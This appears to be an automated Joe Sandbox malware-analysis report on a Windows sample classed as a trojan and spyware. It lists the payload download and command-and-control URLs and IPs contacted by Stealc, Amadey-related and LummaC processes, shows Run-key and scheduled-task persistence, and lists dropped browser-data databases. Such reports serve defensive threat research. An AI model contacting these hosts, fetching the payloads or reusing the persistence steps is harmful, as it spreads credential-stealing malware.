http://185.215.113.26/Dem7kTu/index.phpy	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpf	stealc_default2.exe, 00000015.00000002.2318326891.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.158/3836fd5700214436/nss3.dllsD7l	svchost015.exe, 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpX	stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpP	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
https://garageserviceoperation.com/aL	aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false
https://garageserviceoperation.com/socket/?id=5A	aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpimple-storage.json	stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpT	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://103.130.147.211/Files/2.exeO	axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id13Response	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.000000000317C000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpc	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
https://solutionhub.cc:443/socket/?serviceCheckup	aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
https://garageserviceoperation.com:443/socket/?serviceCheckupJ-	aspnet_regiis.exe, 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php(	Hkbsse.exe, 00000016.00000002.3821765815.0000000001304000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpogramW6432=C:	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id4ResponseD	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php7	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php4	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.117/inc/LummaC222222.exeU	axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id22ResponseD	RegAsm.exe, 0000000C.00000002.2220091098.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.000000000317C000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phprowser	stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id16ResponseD	RegAsm.exe, 0000000C.00000002.2220091098.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php?	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id19ResponseD	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000003010000.00000004.00000800.00020000.00000000.sdmp	false
https://solutionhub.cc:443/socket/?id=/	aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.158	unknown	Russian Federation	9009	M247GB	true
194.116.215.195	unknown	unknown	44676	VMAGE-ASRU	false
185.215.113.26	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
46.19.218.204	unknown	Netherlands	20559	FUNDAMENTS-ASNL	false
103.130.147.211	unknown	Turkey	63859	MYREPUBLIC-AS-IDPTEkaMasRepublikID	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
95.179.250.45	unknown	Netherlands	20473	AS-CHOOPAUS	false
65.21.18.51	unknown	United States	199592	CP-ASDE	false
89.105.223.196	unknown	Netherlands	21159	NOVOSERVE-GMBH-ASFrankfurtGermanyNL	true
185.215.113.117	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
5.53.124.195	unknown	Russian Federation	49505	SELECTELRU	false
81.19.139.138	unknown	Russian Federation	24658	IVC-ASRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519043
Start date and time:	2024-09-26 06:01:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@84/118@0/14
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target axplong.exe, PID 7764 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 7876 because there are no executed function
Execution Graph export aborted for target file.exe, PID 7548 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:03:01	API Interceptor	1148666x Sleep call for process: axplong.exe modified
00:03:13	API Interceptor	92328x Sleep call for process: Hkbsse.exe modified
00:03:16	API Interceptor	91x Sleep call for process: RegAsm.exe modified
00:03:25	API Interceptor	30x Sleep call for process: u3uP67496d.exe modified
00:03:27	API Interceptor	59x Sleep call for process: svchost015.exe modified
00:03:33	API Interceptor	1x Sleep call for process: splwow64.exe modified
00:03:33	API Interceptor	184x Sleep call for process: acentric.exe modified
00:03:37	API Interceptor	3x Sleep call for process: JavvvUmar.exe modified
00:03:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run splwow64.exe C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
00:03:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run splwow64.exe C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
00:03:48	API Interceptor	4455x Sleep call for process: Waters.pif modified
00:03:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url
00:04:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe
00:04:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe
00:05:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce acentric "C:\Users\user\Pictures\Opportunistic Telegraph\acentric.exe" /update
00:05:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce acentric "C:\Users\user\Pictures\Opportunistic Telegraph\acentric.exe" /update
05:02:03	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
05:03:13	Task Scheduler	Run new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
05:03:49	Task Scheduler	Run new task: Tuition path: wscript s>//B "C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.js"
05:05:08	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.202.233.158	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	file.exe	Get hash	malicious	CryptOne, Stealc, Vidar	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	SecuriteInfo.com.Win32.MalwareX-gen.167.30598.exe	Get hash	malicious	CryptOne, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	XpCyBwDzEt.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLine	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	e0OOofAl0S.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
194.116.215.195	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	194.116.215.195/12dsvc.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	194.116.215.195/12dsvc.exe
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	194.116.215.195/12dsvc.exe
185.215.113.26	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	185.215.113.26/Nework.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	185.215.113.26/Nework.exe
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	185.215.113.26/Dem7kTu/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, Cryptbot, LummaC Stealer	Browse	185.215.113.26/Dem7kTu/index.php
	XpCyBwDzEt.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLine	Browse	185.215.113.26/Dem7kTu/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	185.215.113.26/Dem7kTu/index.php
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.26/Dem7kTu/index.php
	Original_Build.exe	Get hash	malicious	Raccoon Stealer v2	Browse	185.215.113.26/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	91.202.233.158
	SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elf	Get hash	malicious	Unknown	Browse	158.46.140.169
	BNE400266900B - RLS SO# W317pdf.scr.exe	Get hash	malicious	Remcos	Browse	104.250.180.178
	BNE400266900A - BL NO.BNE400266900.pdf.scr.exe	Get hash	malicious	XWorm	Browse	104.250.180.178
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	91.202.233.158
	aL8prAD2gL.js	Get hash	malicious	XWorm	Browse	82.102.27.171
	Ref_5010_103.exe	Get hash	malicious	AgentTesla	Browse	172.86.66.70
	Ship_Doc_18505.exe	Get hash	malicious	AgentTesla	Browse	172.86.66.70
	hH9yCaIS6n.exe	Get hash	malicious	Unknown	Browse	172.86.67.251
	8czLF6LCPh.exe	Get hash	malicious	Unknown	Browse	172.86.67.251
VMAGE-ASRU	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	194.116.215.195
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	194.116.215.195
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	194.116.215.195
	jsJ6NIt35F.exe	Get hash	malicious	Go Injector, Stealc, Vidar	Browse	194.116.216.149
	1.exe	Get hash	malicious	Go Injector, RHADAMANTHYS	Browse	193.23.55.27
	1.bin.exe	Get hash	malicious	Go Injector, RHADAMANTHYS	Browse	193.23.55.27
	Catalog co.pdf.lnk	Get hash	malicious	MalLnk	Browse	45.89.53.91
	QTmGYKK6SL.exe	Get hash	malicious	Unknown	Browse	45.89.55.34
	laNODWeL05.elf	Get hash	malicious	Unknown	Browse	45.8.146.126
	88GL8hAsax.elf	Get hash	malicious	Unknown	Browse	45.8.146.126
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	7l2s6qwHg7.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJKECAKEHID

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFCAAEHJDBKJJKFHJEBKFBGDAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBGCBGCAFIIECBFIDHIJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKEHIJJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKFIDHDGIEGCAKFIIJK

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9526
Entropy (8bit):	5.515924904533179
Encrypted:	false
SSDEEP:	192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
MD5:	4580799F1DC5720A7EC1766400E98740
SHA1:	92FD30F47EC545245B934EA492B3C64D5E609AA9
SHA-256:	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
SHA-512:	C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DGCAAAFCBFBAKFHJDBKJJJJJJD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8467337400211222
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
MD5:	7A03CC0EAD0AEFF210C3E60823AAA5EC
SHA1:	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
SHA-256:	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
SHA-512:	8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIDHDGCBFBKECBFHCAF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
